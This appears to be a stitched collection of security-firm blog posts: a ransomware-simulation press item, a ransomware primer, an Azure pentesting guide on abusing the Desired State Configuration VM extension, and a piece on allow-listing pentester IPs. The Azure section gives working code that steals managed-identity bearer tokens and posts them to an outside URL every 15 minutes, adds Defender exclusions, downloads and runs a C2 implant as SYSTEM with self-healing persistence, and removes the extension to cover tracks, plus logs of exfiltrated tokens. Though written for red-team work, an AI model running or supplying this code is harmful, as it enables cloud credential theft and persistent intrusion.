
Minne Inno & MSP Business Journal: NetSPI adds ransomware attack simulation to its penetration testing portfolio

On June 29, 2021, NetSPI President and CEO Aaron Shilts was featured in an article from Minne Inno and Minneapolis/St. Paul Business Journal:

 

Ransomware attacks have recently made headlines as everything from meat suppliers to schools and hospitals falls prey to these unforgiving breaches.

Minneapolis-based NetSPI, a network security firm, is now offering a ransomware attack simulation service to help companies protect themselves.

The service works by emulating real-world ransomware attacks to find and fix vulnerabilities in a company's cybersecurity defenses.

“The DNA and the way we deliver our work lends itself well to helping companies with ransomware,” said NetSPI CEO Aaron Shilts. “… We act as a ransomware attacker, using the same attacks, same tools, and show them where their weakness would be.”

Shilts said the simulation not only illuminates where a breach can be made, but also how the company's systems responded to the attack.

“That’s a big part of it. If you can detect something soon, you can usually protect it before they take out the entire network,” he said. “If you don’t have the detection capabilities, it will spread very quickly.”

With tens of millions of dollars funneling toward the attackers, many of whom are backed by foreign governments, keeping pace with them can seem like a daunting task.

However, out of NetSPI’s 225 employees, 150 are cybersecurity experts who research and familiarize themselves with the latest attack patterns.

Shilts said the team is incredibly sharp and “lives and breathes” cybersecurity.

As for who would benefit the most from the company’s service, Shilts said any operating business is a target for these attacks.

NetSPI’s work gravitates toward heavily regulated financial services firms that store personally identifiable data. But less regulated sectors such as K-12 schools and state and local government are also high-value targets because they’re easier to pick off.

 

To learn more, read the full article here: https://www.bizjournals.com/twincities/inno/stories/news/2021/06/29/netspi-ransom-ware-attack-simulation.html


Ransomware Resiliency 101

What is ransomware?

Ransomware is a type of malware, or malicious software. When infected with ransomware, organizations lose access to their systems and data, and cybercriminals demand a ransom in exchange for releasing the data. In more technical terms, adversaries encrypt your data and demand payment for the decryption key. Typically, a ransom note pops up on a computer explaining the terms of the ransom, including the cost, form of payment, and deadline.

Not only is the threat of ransomware growing, but the impact of ransomware is also increasing. Attacks are becoming more sophisticated, and requested payments are getting larger. Here are five key ransomware trends to pay attention to right now:

Ransomware trends:

  • The ransomware-as-a-service (RaaS) model is on the rise. With RaaS, attackers do not write the malware; they purchase and spread it, paying commissions to the developers for its use.
  • Remote worker entry points are being targeted much more, including remote desktop, employee access gateways, and VPN access portals.
  • Operational technology is a prime target. According to IBM Security X-Force, 41% of all ransomware attacks targeted organizations with operational technology (OT) networks.
  • Email phishing, admin interfaces, and exploits are common entry points, and drive-by downloads (malvertising, force download, or exploit browser) are becoming more popular.
  • Many threat actors that deploy ransomware attempt to disable backup/recovery capabilities, so victims are forced to pay if they want access to their systems and data.

Is my organization a good target for ransomware? 

Every organization is susceptible to a ransomware attack, but there are a few considerations to be aware of that may increase your chance of falling victim. 

  • Are you in an industry that is frequently targeted by ransomware? It’s common for ransomware families to target multiple organizations in a particular industry given that their attack surfaces are similar.
  • Does your organization prioritize security? There are a few industries that have notoriously underfunded security programs, including higher education, startups, and small businesses.
  • Does your organization store and manage high-value data? The higher value the data is, the greater the appetite for ransomware attacks. It’s more likely an organization will pay the ransom to get its data recovered if the data is extremely sensitive. Read: Healthcare’s Guide to Ryuk Ransomware.

How does ransomware work?

Step 1: Getting in | Adversaries can get into a network in numerous ways. Here are four vectors used to gain initial access:

  1. Phishing links and attachments.
  2. Using weak or default credentials to log into single factor remote management interfaces and desktop platforms such as Citrix, Remote Desktop, and VPN access points.
  3. Exploitation of common security vulnerabilities, including SQL injection, broken authentication, broken access control, and insufficient logging and monitoring.
  4. Unintentional download and execution of malware through obfuscation and/or social engineering techniques (drive-by downloads, malvertising, forced download, or browser exploits).

Step 2: Privilege escalation | Once in, adversaries work to exploit bugs, design flaws, or configuration oversights in an operating system or application to gain access to protected databases, file shares, and business sensitive data.

Step 3: Find and exfiltrate sensitive data | Attackers leverage well known techniques to quickly identify servers that may contain sensitive data and upload the data to systems on the internet. 

Step 4: Ransomware deployment | Now it is time to deploy the malicious ransomware code. Ransomware can take many forms, including: locker (uses screen locking to block basic computer functions), wiper (deletes files on a timer), or crypto (encrypts important data and often includes a kill switch to delete data if the ransom is not paid by a specific time).

Step 5: Get paid for the decryption key | Ransomware attackers often request that the ransom be paid in Bitcoin. Once paid, the likelihood of recovering the money is low. Even when money is returned, you’re not likely to get all of it back. For example, in 2021 the FBI recovered $2.3 million of the roughly $4.4 million ransom paid by Colonial Pipeline.

Step 6: Extort additional money by threatening to publish exfiltrated data | Adversaries exfiltrate sensitive data early in the ransomware deployment process so that, even if a ransom is paid, they can continue to threaten the organization and make more money.

Should I pay the ransom?

This is not a yes or no question – it depends on industry regulations, the complexity of the situation, and the business risk. Payments entice bad actors and enable ransomware attacks to continue. Right now, no one is outright prohibiting direct ransomware payments or ransomware insurance claims. If new regulations restricting ransomware payments do emerge, hopefully governments will also offer subsidies to small and medium businesses that can’t afford to partner with security firms but may be considered high-risk targets.

Best practices for ransomware protection.

While we wait for the global cybersecurity community to work toward a solution, organizations must get proactive about their cybersecurity efforts. Here are seven best practices to follow to protect your organization from a ransomware attack: 

  1. Employee awareness, namely phishing prevention and education. 
  2. Limit your external attack surface. Evaluate what you expose to the internet.
  3. Access management: Multi-factor authentication, strong passwords, and least privilege.
  4. Review and test your data backup plan often.
  5. Perform regular penetration testing to identify and remediate your vulnerabilities.
  6. Put your incident response plan, crisis communications and management plan, and business continuity plans to the test.
  7. Practice ransomware resiliency. The more proactive your security efforts, the better you will be able to prevent, detect, and recover from a ransomware attack. Download NetSPI’s ransomware prevention and detection checklists.

While we wait for the global cybersecurity community to work toward solutions, ransomware resiliency planning is going to become a priority for everyone. For more detailed insight on ransomware attacks, how ransomware works, and how to prevent and detect ransomware, download our Ultimate Guide to Ransomware Attacks.

Download the Ultimate Guide to Ransomware Attacks

Azure Persistence with Desired State Configurations

In a previous blog, I described how anyone with the Contributor role in an Azure subscription can run arbitrary scripts on the VMs of that subscription. That blog utilizes the Run Command feature and the Custom Script Extension to execute the payloads. This blog will explore how pentesters can also use the Desired State Configuration (DSC) VM extension to run arbitrary commands, with built-in functionality for recurring commands and persistence.   

Desired State Configuration in Azure

PowerShell Desired State Configuration (DSC) is existing Windows functionality that allows system administrators to declare how a computer should be configured with configuration scripts and resources. This may include installing/running services, local user management, downloading files or running PowerShell scripts. Once enabled, the Local Configuration Manager (LCM) subsystem will automatically and continually monitor the computer’s current configuration, and perform any actions required to apply the desired configuration. 

More recently, Microsoft has brought first-class support for DSC into Azure. This allows Azure administrators to utilize DSC’s powerful functionality to configure and monitor their Azure VMs at the cloud scale. Azure offers two methods of using DSC: Azure Automation State Configuration and the DSC VM extension.

Azure Automation State Configuration vs Desired State Configuration VM Extension

Azure Automation State Configuration allows administrators to use an Azure Automation Account to deploy DSC at scale across their cloud VMs and on-premises systems. This feature is integrated with the Azure Portal and provides a UI to deploy configurations and monitor the systems’ compliance. The DSC artifacts are deployed via a “pull server.” The systems will periodically report their configuration to the Automation Account and retrieve the latest configurations.

While this is very practical functionality, it’s not our best option as pentesters for a couple of reasons. First, it’s not a stealthy technique for controlling the target systems. Cloud administrators can easily observe usage of the Automation State Configuration feature in the portal. Second, when the target systems are updated to pull their DSC artifacts from our Automation Account, this may overwrite legitimate usage of the DSC feature. The target systems may lose their existing configuration, and this may interrupt daily operations.

We’ll avoid these problems by using the DSC VM extension instead. When using the VM extension, DSC artifacts are pushed to individually targeted systems, instead of being pulled from a centralized Automation Account. When deploying artifacts, we can also check to see if DSC is already in use on the system, and if so, stop the deployment. This prevents us from overwriting existing, legitimate configurations. Lastly, the VM extension can be quickly removed after the DSC artifacts are pushed, making this much more difficult to detect in the Azure portal. The VM extension provides more targeted, fine-grained control and allows us to remain under the radar.

Running Arbitrary Scripts Through the Desired State Configuration VM Extension

While not exactly the intended use, plain PowerShell scripts can be run directly through the DSC VM extension. Other features such as RunCommand and the Custom Script Extension are better suited for this, but it is interesting to see that it works (despite not actually providing any configuration). Let’s consider the following PowerShell script:

echo "Hello from DSC. I'm running as $(whoami)" > C:\dsc_hello.txt

DSCHello.ps1

To set up the script as a DSC configuration, we’ll run the following commands from our workstation:

  1. The Publish-AzVMDscConfiguration cmdlet will compress and upload the script to a storage account of our choice.
  2. The Set-AzVMDscExtension cmdlet will add the DSC VM extension to the “jk-dsc-testing” VM. Once the extension is added, it will automatically download the script from the storage account and run it. 
PS C:\> Publish-AzVMDscConfiguration -ConfigurationPath .\DSCHello.ps1 -ResourceGroupName tester -StorageAccountName <your-storage-account-name> 
[TRUNCATED]

PS C:\> Set-AzVMDscExtension -VMName jk-dsc-testing -ConfigurationArchive "DSCHello.ps1.zip" -ConfigurationName "DSCHello" -ResourceGroupName tester -ArchiveStorageAccountName <your-storage-account-name> -Version "2.83"
Set-AzVMDscExtension : Long running operation failed with status 'Failed'. Additional Info:'VM has reported a failure when processing extension 'Microsoft.Powershell.DSC'. [TRUNCATED]

After about a minute, the second Set-AzVMDscExtension command returns an error. This is expected because our DSCHello.ps1 script does not actually include a valid DSC configuration. Despite this error, our script was executed on the target VM. We can confirm this by using the RunCommand feature to check the contents of the output file: C:\dsc_hello.txt. 

RunCommand Output

The output within the file confirms that the script was executed successfully, despite the error returned by the Set-AzVMDscExtension command. It also confirms that our script is running as SYSTEM on the VM. 
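
For reference, this verification can also be scripted from the workstation via the Az module. A minimal sketch, assuming the same resource group, VM, and output path as above:

PS C:\> Set-Content -Path .\check.ps1 -Value 'Get-Content C:\dsc_hello.txt'
PS C:\> Invoke-AzVMRunCommand -ResourceGroupName tester -VMName jk-dsc-testing -CommandId 'RunPowerShellScript' -ScriptPath .\check.ps1

Verifying the DSC output file via the Run Command feature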

While it’s nice to know that the DSC VM extension can be used for one-off scripts, there are better tools for this task at our disposal. We’ll instead focus on utilizing the power of DSC for our more common tasks as pentesters. 

Practical DSC Extension Usage

While the above process does result in privileged script execution, it doesn’t maximize the functionality offered by the DSC VM extension. We can improve upon this in several ways. 

Using Actual DSC Configuration Artifacts

The simplest improvement is to add an actual configuration to our script. There are many different types of DSC Resources that can be used within a DSC configuration. The most versatile is the Script Resource, which we’ll use to wrap whatever functionality we’d like to deploy. If we were rewriting the above example to use a Script Resource, it would appear in our DSC script as:

Configuration DSCHello
{
	Node localhost
	{
		Script ScriptExample
		{
			SetScript = {
				echo "Hello from DSC. I'm running as $(whoami)" > C:\dsc_hello.txt
			}
			TestScript = { 
				return Test-Path C:\dsc_hello.txt 
			}
			GetScript = { @{ Result = (Get-Content C:\dsc_hello.txt) } }
		}
	}
}

DSCHello.ps1 (with Configuration and Script Resource)

When deployed via the DSC VM extension with the previous commands, the Set-AzVMDscExtension command will now complete successfully because we’ve provided a well-formed DSC configuration. We’ve also provided a TestScript which will test for the presence of the C:\dsc_hello.txt output file. 

Automatic Recurring Execution

One of the key features of DSC is the capability to detect if a system has drifted from its desired state, and to automatically apply any necessary configuration changes. We can use this built-in functionality to automatically run our commands as many times as we’d like. We’ll see some additional examples of this later in the post, but for now we’ll continue the example from above. Note the TestScript ScriptBlock in the previous code segment. If the C:\dsc_hello.txt file is ever removed from the file system after the initial execution, the TestScript command will return false, and the SetScript command will be run again. 

While this capability is built into DSC, it’s not enabled by default. But we can enable it while deploying our DSC artifacts to the target system. To do that, we’ll prepend the following commands to our growing DSCHello.ps1 script. 

[DscLocalConfigurationManager()]
Configuration DscMetaConfigs
{
    Node localhost
    {
        Settings
        {
            RefreshFrequencyMins           = 30
            RefreshMode                    = 'PUSH'
            ConfigurationMode              = 'ApplyAndAutoCorrect'
            AllowModuleOverwrite           = $False
            RebootNodeIfNeeded             = $False
            ActionAfterReboot              = 'ContinueConfiguration'
            ConfigurationModeFrequencyMins = 15
        }
    }
}
DscMetaConfigs -Output .\output\
Set-DscLocalConfigurationManager -Path .\output\

Commands to be added to DSCHello.ps1 to enable automatic recurring execution.

These commands will update the DSC Local Configuration Manager (LCM), which is the subsystem responsible for keeping the system in its configured desired state. The key update is changing the “ConfigurationMode” value to “ApplyAndAutoCorrect” to ensure our SetScript commands are executed whenever the TestScript block returns false. After this update, the LCM will check the system’s configuration every 15 minutes and apply any necessary configurations. Unfortunately, this is the most frequent schedule that can be configured.
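
To confirm the meta-configuration took effect, the LCM's active settings can be queried on the target VM (for example, through the Run Command feature). A sketch of the expected result, assuming the settings above applied cleanly:

PS C:\> Get-DscLocalConfigurationManager | Select-Object ConfigurationMode, ConfigurationModeFrequencyMins, RefreshMode

ConfigurationMode   ConfigurationModeFrequencyMins RefreshMode
-----------------   ------------------------------ -----------
ApplyAndAutoCorrect                             15 PUSH

Querying the Local Configuration Manager settings on the target VM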

Polite Execution: Checking if DSC is Already in Use

As mentioned earlier, we wouldn’t want to make these DSC/LCM updates if the target system is already using DSC for a legitimate purpose. In a standard pentest, this has too high of a risk of disrupting normal functionality. And in a red team scenario, this change could lead to more rapid detection by the blue team. 

To avoid this, we can update our script to check if the system currently has any DSC configuration already applied. By prepending the following commands to our ever-growing DSCHello.ps1 file, the script will first check if there’s an existing configuration, and exit if any exists. 

$type = Get-DscConfigurationStatus | select -ExpandProperty Type
if ( $? -and ($type -ne 'Initial'))
{
    exit
}

Commands to be added to DSCHello.ps1 to exit if DSC is already in use.

With this addition, our DSCHello.ps1 file is complete and ready for deployment. It will confirm that the DSC feature is not already in use on the target system. It will configure the LCM to automatically re-execute our commands as needed. And it will complete successfully because it provides a well-formed DSC configuration and resource. The complete version of this example script is available for review here.

Covering Tracks: Removing the DSC VM Extension

After deploying the DSC VM extension, it can be viewed in the Azure Portal under the target VM’s “Extensions” blade. 

The DSC extension listed in the VM’s “Extensions” blade

If you click the “View detailed status” link, there are execution details, including some of the script output. To cover our tracks, we can eliminate this information by simply removing the DSC VM extension itself using the Remove-AzVMDscExtension cmdlet. This removes the extension information from the portal and deletes the deployment artifacts from the target VM. However, it does leave behind the existing logs in the C:\WindowsAzure\Logs\Plugins\Microsoft.Powershell.DSC\<VERSION> directory.
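
A minimal sketch of that cleanup step, assuming the same VM as earlier (the extension is registered under the name Microsoft.Powershell.DSC):

PS C:\> Remove-AzVMDscExtension -ResourceGroupName tester -VMName jk-dsc-testing -Name 'Microsoft.Powershell.DSC'

Removing the DSC VM extension with Remove-AzVMDscExtension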

Fortunately for us though, this does not remove the deployed DSC configuration from the target VM. If configured as a recurring or persistent task, it will continue to run on the set schedule. We’re free to clean up the extension and artifacts, and still retain our functionality.

Deploying Pre-Configured DSC Artifacts

The official Set-AzVMDscExtension cmdlet is very useful, but it assumes that the DSC artifacts to be deployed were uploaded to a caller-controlled storage account using the Publish-AzVMDscConfiguration command. While this is generally true for its intended usage, it is not ideal for pentesters. To use the Set-AzVMDscExtension command against a targeted VM in an engagement, we would have to also upload the DSC artifacts into a storage account within the same Azure subscription using the Publish-AzVMDscConfiguration command. This leaves behind additional artifacts which may be detected by the blue team, and reduces the reusability of our artifacts.

As a workaround, I’ve added the Invoke-DscVmExtension function to the MicroBurst framework. This is a reimplementation of the Set-AzVMDscExtension cmdlet which instead deploys DSC artifacts hosted at any publicly accessible URL. The example DSC artifacts used throughout this blog are hosted in the MicroBurst GitHub repo and available for use. We can use the Invoke-DscVmExtension function to deploy the DSC VM extension and download our pre-made artifacts from there. This greatly increases the reusability of these artifacts.

Additionally, the Invoke-DscVmExtension function automatically removes the DSC VM extension from the target system after the deployment. This results in a stealthier overall deployment.

We can use this single function to do the following:

  1. Add the DSC VM extension to a target VM, which then performs the following:
    1. Download the publicly hosted, reusable artifacts from an input URL.
    2. Check if any DSC configurations are already in use.
    3. Update the Local Configuration Manager to automatically run our deployed configuration every 15 minutes. 
    4. Run the provided script as SYSTEM.
  2. Remove the DSC VM extension to cover our tracks in the portal.

And here’s how it looks in action:

PS C:\ > Invoke-DscVmExtension -Name jk-dsc-testing -ResourceGroupName tester  -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/DSCHello.ps1.zip"
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Execution of Invoke-DscVmExtension function

Example 1: A Recurring Task to Export Managed Identity Tokens

An Azure VM can be directly assigned permissions to other Azure resources through the VM’s managed identity. NetSPI’s Karl Fosaaen has thoroughly explored how attackers and pentesters can exploit this in his previous blogs. If you’d like a deeper dive into managed identities, I recommend his in-depth review here. In that blog, Karl describes how anyone with command execution on the VM can obtain an access token for that VM’s managed identity by sending an HTTP request to the Azure Metadata Service URL. 

Additionally, NetSPI’s Josh Magri explored in his blog post how bearer tokens can be passed to the Azure REST APIs to perform actions authorized as that identity. This provides a straightforward mechanism for enumerating the target subscription and moving laterally/vertically. 
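
As a quick illustration of that pattern, a captured token can be passed in an Authorization header to the ARM REST API, for example to list the subscriptions visible to the identity. A minimal sketch, assuming $accessToken holds the access_token value returned by the metadata service:

PS C:\> $headers = @{ Authorization = "Bearer $accessToken" }
PS C:\> Invoke-RestMethod -Uri 'https://management.azure.com/subscriptions?api-version=2020-01-01' -Method GET -Headers $headers

Using an exfiltrated bearer token against the Azure REST APIs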

Let’s combine these concepts with the DSC VM extension. We’ll deploy a DSC configuration which will execute our commands. Our configuration will send a request to the Azure Metadata Service from the target VM and obtain the bearer token for that VM’s managed identity. Once we’ve obtained the bearer token, we’ll exfiltrate it from the server by sending an HTTP POST request to a URL of our choice. 

The full code for the script is available for review here, but the core DSC configuration is included below:

Configuration ExportManagedIdentityToken
{

  param
  (
    [String]
    $ExportURL
  )

  Import-DscResource -ModuleName 'PSDesiredStateConfiguration'

  Node localhost
  {
    Script ScriptExample
    {
      SetScript = {
        $metadataResponse = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls12
        Invoke-RestMethod -Method 'Post' -URI $using:ExportURL -Body $metadataResponse.Content -ContentType "application/json"
      }
      TestScript = {
        return $false
      }
      GetScript = { return @{result = 'result'} }
    }
  }
} 

The ExportManagedIdentityToken.ps1 Configuration Snippet

In the above configuration, there are a few key components:

  1. Note that we’re passing in the $ExportURL value as a Configuration parameter. This allows us to re-use the configuration and decide at deployment time where the bearer token will be exfiltrated.
  2. As described earlier, the SetScript script block obtains the bearer token from the Azure Metadata Service URL and sends it as a POST request to the $ExportURL value.
  3. The TestScript ScriptBlock always returns false. This ensures the commands are executed every 15 minutes, guaranteeing we always have a fresh, valid bearer token for extended persistence.

To receive and process the bearer token sent by the script, we’ll deploy a simple PowerShell Azure Function App to a separate subscription under our control. This will extract the incoming bearer token and call the Azure REST APIs to review the permissions assigned to it. The full code for the Function App is available here and is essentially copy-pasted from the “Enumeration” section of Josh’s blog.
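
The core of that Function App is a short HTTP-triggered run.ps1. Below is a simplified sketch of the receiving side only; the REST API enumeration from Josh's blog is omitted, and the response body is arbitrary:

using namespace System.Net

param($Request, $TriggerMetadata)

# The DSC configuration POSTs the raw metadata service response as JSON,
# so the parsed body exposes access_token, client_id, expires_on, etc.
$token = $Request.Body
Write-Host "Incoming token for client_id $($token.client_id)"
Write-Host "Access token: $($token.access_token)"

# Acknowledge receipt so the sender's Invoke-RestMethod completes cleanly
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
    Body       = 'received'
})

A simplified run.ps1 sketch for the token-receiving Function App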

We’ll deploy the script with the Invoke-DscVmExtension function described in the previous section. In this example, we’ll pass the target VM via the pipeline, and we’ll pass the $ExportURL value as a ConfigurationArgument. The function will automatically handle the deployment and cleanup.

PS C:\ > Get-AzVM -Name jk-dsc-testing -ResourceGroupName tester  |  Invoke-DscVmExtension -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/ExportManagedIdentityToken.ps1.zip" -ConfigurationArgument @{ExportURL="https://[your-function-app].azurewebsites.net/api/TokenEndpoint"}
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Deploying the ExportManagedIdentityToken script via the Invoke-DscVmExtension function

During the deployment, and every 15 minutes thereafter, the bearer token will be POSTed to the Function App. We can monitor the Function App’s logs to observe the incoming value and which permissions are assigned to the managed identity. 

2021-06-08T04:13:45.474 [Information] Executing 'Functions.MgCatchingFunction' (Reason='This function was programmatically called via the host APIs.', Id=d0dd2ee5-6b47-48c6-8bf2-10e74197e769)
2021-06-08T04:13:45.481 [Information] INFORMATION: PowerShell HTTP trigger function processed a request. Incoming JSON contents
2021-06-08T04:13:45.486 [Information] OUTPUT:
2021-06-08T04:13:45.487 [Information] OUTPUT: Name                           Value
2021-06-08T04:13:45.491 [Information] OUTPUT: ----                           -----
2021-06-08T04:13:45.491 [Information] OUTPUT: resource                       https://management.azure.com/
2021-06-08T04:13:45.492 [Information] OUTPUT: access_token                   eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtp…
2021-06-08T04:13:45.492 [Information] OUTPUT: expires_on                     1623209325
2021-06-08T04:13:45.492 [Information] OUTPUT: ext_expires_in                 86399
2021-06-08T04:13:45.493 [Information] OUTPUT: token_type                     Bearer
2021-06-08T04:13:45.494 [Information] OUTPUT: client_id                      367d6d5b-cf5f-4818-abb6-b6ea700b377f
2021-06-08T04:13:45.495 [Information] OUTPUT: not_before                     1623122625
2021-06-08T04:13:45.495 [Information] OUTPUT: expires_in                     83700
2021-06-08T04:13:45.495 [Information] INFORMATION: Access token
2021-06-08T04:13:45.496 [Information] OUTPUT: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtp…
2021-06-08T04:13:45.496 [Information] INFORMATION: Principal ID
2021-06-08T04:13:45.496 [Information] OUTPUT: 821ace7f-e6d8-4ba2-8304-ef45fbb4fb19
2021-06-08T04:13:45.496 [Information] INFORMATION: /subscriptions/d4[REDACTED]b2/resourcegroups/tester/providers/Microsoft.Compute/virtualMachines/jk-dsc-testing
2021-06-08T04:13:45.497 [Information] INFORMATION: Subscription ID
2021-06-08T04:13:45.497 [Information] OUTPUT: d4[REDACTED]b2
2021-06-08T04:13:45.497 [Information] INFORMATION: VM Name
2021-06-08T04:13:45.497 [Information] OUTPUT: jk-dsc-testing
2021-06-08T04:13:46.001 [Information] OUTPUT: Current identity has permission Reader on scope /subscriptions/d4[REDACTED]b2

Function App log output showing the exfiltrated bearer token and the permissions assigned to the managed identity

Example 2: A Persistent Command and Control Implant

Using DSC, not only can we execute tasks on a recurring schedule, but we can also utilize its self-correcting behavior to deploy persistent C2 implants on the target VM. In the example below, we’ll be using Covenant as our C2 framework. This will both host our malicious executable and listen for its callback. This blog won’t cover how to use Covenant, but for more information on that topic, please see my previous blog post in which I deployed Covenant’s implants (“grunts”) using Azure’s Custom Script Extension. 

The DeployDSCAgent DSC configuration performs the following tasks:

  1. Create a destination folder for the executable to be downloaded into.
  2. Create a Windows Defender exclusion for the destination folder. 
  3. Create a Windows Defender exclusion for the full path of the executable. 
  4. Create a Windows Defender exclusion for the executable’s process.
  5. Download the hosted implant from the input URL. 
  6. Execute the malicious implant, providing remote control as the SYSTEM process.
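
A condensed sketch of how those tasks map onto DSC resources is below; the folder path, executable name, and resource names here are hypothetical stand-ins, and the real configuration on GitHub differs in its details:

Configuration DeployDSCAgent
{
  param ( [String] $ImplantURL )

  Node localhost
  {
    File ImplantFolder
    {
      Ensure          = 'Present'
      Type            = 'Directory'
      DestinationPath = 'C:\Tools'    # hypothetical destination folder (task 1)
    }
    Script ImplantScript
    {
      SetScript = {
        # Defender exclusions for the folder, file, and process (tasks 2-4)
        Add-MpPreference -ExclusionPath 'C:\Tools'
        Add-MpPreference -ExclusionPath 'C:\Tools\implant.exe'
        Add-MpPreference -ExclusionProcess 'implant.exe'
        # Download and launch the hosted implant as SYSTEM (tasks 5-6)
        Invoke-WebRequest -Uri $using:ImplantURL -OutFile 'C:\Tools\implant.exe' -UseBasicParsing
        Start-Process 'C:\Tools\implant.exe'
      }
      TestScript = {
        # Re-run SetScript if the implant file or its process goes missing
        return ((Test-Path 'C:\Tools\implant.exe') -and
                ($null -ne (Get-Process -Name 'implant' -ErrorAction SilentlyContinue)))
      }
      GetScript = { @{ Result = (Test-Path 'C:\Tools\implant.exe') } }
      DependsOn = '[File]ImplantFolder'
    }
  }
}

A condensed, hypothetical sketch of the DeployDSCAgent configuration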

The full code for the DSC configuration is relatively simple, but a bit too long to include here in its entirety; the condensed sketch above captures its core structure, and the complete code is available for review on GitHub. Deploying the DSC extension to the target VM is as straightforward as before:

PS C:\ > Get-AzVM -Name jk-dsc-testing -ResourceGroupName tester  |  Invoke-DscVmExtension -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/DeployDSCAgent.ps1.zip" -ConfigurationArgument @{ImplantURL="https://172.18.0.5/GruntHTTP40.exe"}
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Deploying the DeployDSCAgent script via the Invoke-DscVmExtension function

A few minutes after the Invoke-DscVmExtension command is started, our Covenant listener will detect that the implant has been executed and is awaiting further commands. 

The Covenant implant is deployed and connects back to the C2 server.

The beauty of using DSC for this task is that the status of the above 6 tasks will be automatically checked every 15 minutes. If any of them are incomplete (for example, if a sysadmin deletes our implant, kills the process, or removes the Defender exclusions) then they will be automatically re-executed along with any previous steps. This provides us with robust persistence on the target VM.  

Final Thoughts

We’ve seen how the DSC VM extension provides yet another mechanism for privileged Azure users (such as those with the Contributor role) to achieve command execution on Azure VMs. While other VM extensions provide command execution as well, the DSC VM extension offers built-in support for recurring commands and advanced persistence techniques. The Invoke-DscVmExtension cmdlet added to the MicroBurst framework provides easy reusability of premade, public DSC configurations across multiple pentest engagements. Altogether, the DSC VM extension is a robust tool that any Azure pentester should consider.


To Add Value to Your Penetration Testing, Allow List Source IPs

A critical component of an external network penetration test or web application penetration test is excluding pentester IP addresses from being blocked by the organization’s Intrusion Prevention System (IPS) and Web Application Firewall (WAF). This request is often met with hesitancy. Common concerns I have heard include:

  • “The findings won’t accurately represent the risks of our attack surface.”
  • “Are we allowing others access too? And will the pentesters reach our internal network?”
  • “If we are paying for a pentest, why should we need to do this additional work to make these temporary configuration changes?”
  • “We are concerned with the efficacy of our IPS/WAF systems and want this to be tested too.”

If pentests aim to test from the perspective of a real threat actor, why would a penetration testing company ask to allow list their IPs when an attacker would not have the same access?

It’s true that a pentest simulates threat actors, but its core purpose is to identify all the security gaps that exist in the environment being tested. By nature, a tester cannot truly simulate an adversary because adversaries have unlimited time, while pentesters are typically limited to a few days or weeks. Penetration tests have to bridge the gap and emulate rather than simulate a real attacker – and removing the hurdle of bypassing the IPS/WAF is one critical way to do this. 

IPS/WAF can be bypassed using publicly available tools.

IPS/WAFs are great for protecting against the bots and scanners constantly bombarding your external attack surface, but there are many well-known ways to bypass them using publicly available tools and resources. The documentation for these systems is often found online and can be quite detailed, revealing the sequence of events or probes that typically cause them to take defensive action. Attackers with time can learn how to subvert these technologies by utilizing various tools, proxies, and techniques (read: Dark Reading, OWASP, SANS, Black Hat).

Further, intrusion detection and prevention systems rely on signatures. Oftentimes, these signatures are publicly listed and can be easily thwarted. It is important to remember that, during a web app pentest or external network pentest, the goal is not to test your IPS provider, it is to test your attack surface. 

When conducting a pentest under strict time constraints, it makes sense that a pentester would not want their IP address blocked by rules or signatures. Given that a sophisticated attacker has the time and ability to bypass IPS/WAF implementations, the working philosophy of offensive security becomes: (attacker + time + IPS/WAF) = (tester – time – IPS/WAF)

It is unrealistic to expect a pentester to accomplish more in days than a black hat hacker group would in months, or than thousands of internet bots with unlimited time would. Allow listing is a counterintuitive, but necessary, balancing act. The value of a pentest should therefore not be measured by its ability to simulate an adversary, but by the quality of findings it uncovers that an adversary could exploit.

How allow listing/excluding works.

Allow listing, or excluding, IPs on an IPS/WAF is a configuration change that tells these security solutions to continue alerting on, identifying, and blocking malicious traffic as they normally would, except for the traffic coming from the tester’s IP addresses. Important to note: while pentester IPs should not be blocked, logging and alerting functions should continue, as security assessors will consider an organization’s visibility into events on its attack surface. Most major security vendors allow for this type of configuration. If you are using a next-generation firewall, the change is made in the WAF or IPS settings, not on the firewall itself.
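
Syntax varies by vendor, but as one hedged illustration, a ModSecurity deployment can switch its rule engine to detection-only (log and alert, but never block) for the tester's source range with a single rule; the IP range below is a documentation-only placeholder:

# Hypothetical tester range; rules still evaluate and log for this
# traffic, but blocking actions are suppressed for these sources only.
SecRule REMOTE_ADDR "@ipMatch 203.0.113.0/24" \
    "id:1001,phase:1,pass,nolog,ctl:ruleEngine=DetectionOnly"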

It is not necessary to make changes that allow a tester internal network access, as these tests should be conducted only on the public-facing, or external, attack surface. Allow listing/exclusion is only in place for the duration of the penetration test and is removed immediately after. Source IP addresses that are not associated with pentesters will be treated as they normally would.

If you want to specifically test your WAF, intrusion detection systems (IDS), or intrusion prevention systems (IPS), a WAF or firewall bypass test, red team operation, or black box assessment may be more appropriate.

The benefits of allow listing/excluding your penetration testers.

Allow listing comes with its own challenges, including immense coordination and alignment with all stakeholders. But its benefits outweigh the challenges. 

When a pentester’s IP addresses are allow listed, more findings can be uncovered in the time allotted, resulting in more fixes, less overall risk, and ultimately greater ROI from the resources allocated to testing. Key benefits include:

  1. More true positive findings
  2. Shorter testing timeframe
  3. Correlate alerts with testers to avoid time wasted triaging 
  4. More accurate results and fewer false positives

